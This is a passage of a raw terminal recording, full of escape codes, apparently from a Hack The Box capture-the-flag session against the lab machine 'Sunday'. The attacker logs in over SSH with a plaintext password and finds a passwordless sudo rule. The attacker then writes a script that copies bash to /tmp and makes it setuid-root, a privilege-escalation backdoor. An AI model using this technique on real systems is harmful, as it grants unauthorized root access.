01b[94m\u001b[2;120H└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'sunday' ssh sunny@sunday.htb -p 22022\u001b[K\u001b[3;120HLast login: Sat Sep  3 16:07:20 2022 from 10.10.14.31\u001b[K\u001b[4;120HOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[K\u001b[5;120Hsunny@sunday:~$ sudo -l\u001b[K\u001b[6;120HUser sunny may run the following commands on sunday:\u001b[K\u001b[7;120H    (root) NOPASSWD: /r"]
[22.836857, "o", "oot/troll\u001b[K\u001b[8;120Hsunny@sunday:~$ \u001b[K\u001b[9;120H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[30m\u001b[42m\r\n[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[52;1H"]
[22.837824, "o", "\u001b[?25l\u001b[1;119H│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\r\n\u001b[32m──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;119H│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[5"]
[22.838048, "o", "7;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:bash*                                                                                                                                                                                                       \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[52;1H"]
[22.876726, "o", "\u001b[?2004h"]
[22.877433, "o", "\u001b[10d-bash-4.4$ \u001b[107X\u001b[52;1H"]
[22.877803, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\u001b(B\u001b[m"]
[22.87801, "o", "\r\n"]
[22.878196, "o", "\u001b[94m└─\u001b[31m\u001b[1m#\u001b(B\u001b[m "]
[24.126277, "o", "n"]
[24.188868, "o", "a"]
[24.287692, "o", "n"]
[24.340881, "o", "o"]
[24.398956, "o", " "]
[24.581975, "o", "t"]
[24.736876, "o", "r"]
[24.766689, "o", "o"]
[24.929981, "o", "l"]
[25.053348, "o", "l"]
[25.143193, "o", "\r\n\u001b[?2004l"]
[25.145992, "o", "\u001b[?2004h\u001b[?25l\u001b[52;118H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[?12l\u001b[?25h\u001b[52;1H\u001b[?25l"]
[25.146478, "o", "\u001b[52;100r\u001b[53;118H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[52d\u001b[1K\u001b[98;54H\u001b[7m[ New File ]\u001b[1;101r\u001b[98;66H\u001b(B\u001b[m"]
[25.147156, "o", "\u001b[52;1H\u001b[7m  GNU nano 6.1                                             troll                                                      \u001b[99;1H^G\u001b(B\u001b[m Help\u001b[9C\u001b[7m^O\u001b(B\u001b[m Write Out    \u001b[7m^W\u001b(B\u001b[m Where Is     \u001b[7m^K\u001b(B\u001b[m Cut\u001b[10C\u001b[7m^T\u001b(B\u001b[m Execute\u001b[6C\u001b[7m^C\u001b(B\u001b[m Location     \u001b[7mM-U\u001b(B\u001b[m Undo\r\n\u001b[7m^X\u001b(B\u001b[m Exit\u001b[9C\u001b[7m^R\u001b(B\u001b[m Read File    \u001b[7m^\\\u001b(B\u001b[m Replace\u001b[6C\u001b[7m^U\u001b(B\u001b[m Paste\u001b[8C\u001b[7m^J\u001b(B\u001b[m Justify\u001b[6C\u001b[7m^/\u001b(B\u001b[m Go To Line   \u001b[7mM-E\u001b(B\u001b[m Redo"]
[25.147314, "o", "\u001b[53;1H\u001b[?12l\u001b[?25h"]
[25.447787, "o", "\u001b[?25l\u001b[52;66H\u001b[7m*"]
[25.448005, "o", "\u001b[50C\u001b(B\u001b[m\r\n\u001b[36m#\u001b[?12l\u001b[?25h\u001b(B\u001b[m"]
[25.578961, "o", "\u001b[?25l"]
[25.579188, "o", "\u001b[?12l\u001b[?25h\u001b[36m!\u001b(B\u001b[m"]
[26.108355, "o", "\u001b[?25l\u001b[1;119H│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\r\n\u001b[32m──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;119H│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[5"]
[26.108404, "o", "7;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:nano*                                                                                                                                                                                                       \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[53;3H"]
[26.108693, "o", "\u001b[36m/\u001b(B\u001b[m"]
[26.295005, "o", "\u001b[36mb\u001b(B\u001b[m"]
[26.394726, "o", "\u001b[36mi\u001b(B\u001b[m"]
[26.451762, "o", "\u001b[36mn\u001b(B\u001b[m"]
[26.690246, "o", "\u001b[36m/\u001b(B\u001b[m"]
[26.744075, "o", "\u001b[36mb\u001b(B\u001b[m"]
[26.8959, "o", "\u001b[36ma\u001b(B\u001b[m"]
[26.947777, "o", "\u001b[36ms\u001b(B\u001b[m"]
[26.996005, "o", "\u001b[36mh\u001b(B\u001b[m"]
[27.133804, "o", "\r\n"]
[27.543318, "o", "\r\n"]
[27.692859, "o", "c"]
[27.778089, "o", "p"]
[27.970046, "o", " "]
[28.337172, "o", "/"]
[28.50174, "o", "\u001b[?25l"]
[28.501915, "o", "t\u001b[?12l\u001b[?25h"]
[28.590959, "o", "m"]
[28.660781, "o", "\u001b[?25l"]
[28.660964, "o", "p\u001b[98;118H\u001b[1K\u001b[55;8H\u001b[?12l\u001b[?25h"]
[28.955973, "o", "\u001b[?25l\u001b[?12l\u001b[?25h\b \b"]
[29.103832, "o", "\b \b"]
[29.266835, "o", "\b \b"]
[29.413222, "o", "\u001b[?25l\u001b[?12l\u001b[?25h\b "]
[29.413523, "o", "\b"]
[30.08602, "o", "/"]
[30.241857, "o", "b"]
[30.34891, "o", "i"]
[30.407539, "o", "\u001b[?25ln\u001b[?12l\u001b[?25h"]
[30.626853, "o", "\u001b[?25l\u001b[?12l\u001b[?25h"]
[30.627108, "o", "/"]
[30.683963, "o", "b"]
[30.82286, "o", "a"]
[30.872584, "o", "s"]
[30.930709, "o", "\u001b[?25lh\u001b[?12l\u001b[?25h"]
[31.050874, "o", " "]
[31.598879, "o", "\u001b[?25l"]
[31.598995, "o", "/\u001b[?12l\u001b[?25h"]
[31.754159, "o", "t"]
[31.839751, "o", "\u001b[?25lm\u001b[?12l\u001b[?25h"]
[31.896025, "o", "p"]
[32.089978, "o", "r"]
[32.330963, "o", "\u001b[?25l"]
[32.331464, "o", "\u001b[?12l\u001b[?25h\b \b"]
[32.411882, "o", "\u001b[?25l"]
[32.412197, "o", "/\u001b[?12l\u001b[?25h"]
[32.568825, "o", "r"]
[32.688988, "o", "o"]
[32.855954, "o", "o"]
[32.942369, "o", "\u001b[?25lt\u001b[?12l\u001b[?25h"]
[33.058518, "o", "\u001b[?25lb\u001b[?12l\u001b[?25h"]
[33.179857, "o", "a"]
[33.214556, "o", "s"]
[33.261379, "o", "\u001b[?25l"]
[33.261618, "o", "\u001b[?12l\u001b[?25h"]
[33.261892, "o", "h"]
[34.167963, "o", "\u001b[?25l"]
[34.16823, "o", "\u001b[?12l\u001b[?25h"]
[34.168379, "o", ";"]
[34.808233, "o", " "]
[34.913079, "o", "c"]
[35.011828, "o", "h"]
[35.209812, "o", "m"]
[35.270065, "o", "o"]
[35.389074, "o", "d"]
[36.104057, "o", "\b \b"]
[36.647138, "o", "d"]
[36.845185, "o", " "]
[37.070771, "o", "6"]
[37.561913, "o", "\b \b"]
[37.624351, "o", "4"]
[37.866101, "o", "7"]
[38.089109, "o", "5"]
[38.267186, "o", "5"]
[38.51403, "o", " "]
[38.900144, "o", "/"]
[39.077673, "o", "t"]
[39.185037, "o", "m"]
[39.226485, "o", "p"]
[39.487991, "o", "/"]
[39.693864, "o", "r"]
[39.802095, "o", "p"]
[40.211986, "o", "\b \b"]
[40.42295, "o", "o"]
[40.567825, "o", "o"]
[40.64483, "o", "\u001b[?25lt\u001b[?12l\u001b[?25h"]
[40.775826, "o", "\u001b[?25l"]
[40.775992, "o", "b\u001b[?12l\u001b[?25h"]
[40.898156, "o", "a"]
[40.935716, "o", "s"]
[40.99306, "o", "h"]
[44.330863, "o", "\u001b[?25l\u001b[98;1H\u001b[7mSave modified buffer?                                                                                                 \r\n Y\u001b(B\u001b[m Yes\u001b[112X"]
[44.330945, "o", "\r\n\u001b[7m N\u001b(B\u001b[m No  \u001b[10C\u001b[7mC\u001b(B\u001b[m Cancel\u001b[93X\u001b[98;23H\u001b[?12l\u001b[?25h"]
[45.180083, "o", "\r\n\u001b[7m^G\u001b(B\u001b[m Help\u001b[22C\u001b[7mM-D\u001b(B\u001b[m DOS Format\u001b[15C\u001b[7mM-A\u001b(B\u001b[m Append\u001b[19C\u001b[?25l"]
[45.180422, "o", "\u001b[7mM-B\u001b(B\u001b[m Backup File\r\n\u001b[7m^C\u001b(B\u001b[m Cancel\u001b[7C             \u001b[7mM-M\u001b(B\u001b[m Mac Format\u001b[15C\u001b[7mM-P\u001b(B\u001b[m Prepend\u001b[18C\u001b[7m^T\u001b(B\u001b[m Browse\u001b[98;1H\u001b[7mFile Name to Write: troll\u001b(B\u001b[m"]
[45.180481, "o", "\u001b[?12l\u001b[?25h"]
[45.515771, "o", "\u001b[25C\u001b[1K\u001b[C \u001b[7m[ Writing... ]\u001b(B\u001b[m\u001b[52X\u001b[?25l"]
[45.516167, "o", "\u001b[52;66H\u001b[7m \u001b[50C\u001b(B\u001b[m"]
[45.516294, "o", "\u001b[98;51H"]
[45.517151, "o", "\u001b[7m[ Wrote 3 lines ]\u001b(B\u001b[m\u001b[52;100r\u001b[99;118H\u001b[1K\n\u001b[1K\u001b[2A\u001b[1K\u001b[1;101r\u001b[54;1H\u001b[?12l\u001b[?25h\u001b[?2004l\u001b[?25l\u001b[52;118H\u001b[1K\u001b[94m\r┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[53;118H\u001b[1K\u001b[94m\r└─\u001b[31m\u001b[1m#\u001b(B\u001b[m nano troll\u001b[54;118H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[?12l\u001b[?25h\u001b[54;1H"]
[45.517696, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[50.301581, "o", "\u001b[?25l\u001b[1;119H│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\r\n\u001b[32m──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;119H│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[5"]
[50.301631, "o", "7;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:bash*                                                                                                                                                                                                       \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[55;5H"]
[50.484831, "o", "\u001b[?25l\u001b[1;119H\u001b[32m│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\r\n──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;119H\u001b[39m│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H"]
[50.484863, "o", "│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;12H\u001b[?2004l"]
[50.485558, "o", "\u001b[?25l\u001b[1;119H\u001b[32m│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\r\n──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;119H\u001b[39m│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H"]
[50.485674, "o", "│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;12H"]
[52.931708, "o", "\u001b[?25l\u001b[1;119H\u001b[32m│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\r\n\u001b[39m──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m┤\u001b[52;119H│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;"]
[52.931766, "o", "119H│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[8;136H"]
[53.432949, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[101;1H[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:10 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[8;136H"]
[53.81385, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m┤\u001b[52;118H│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118"]
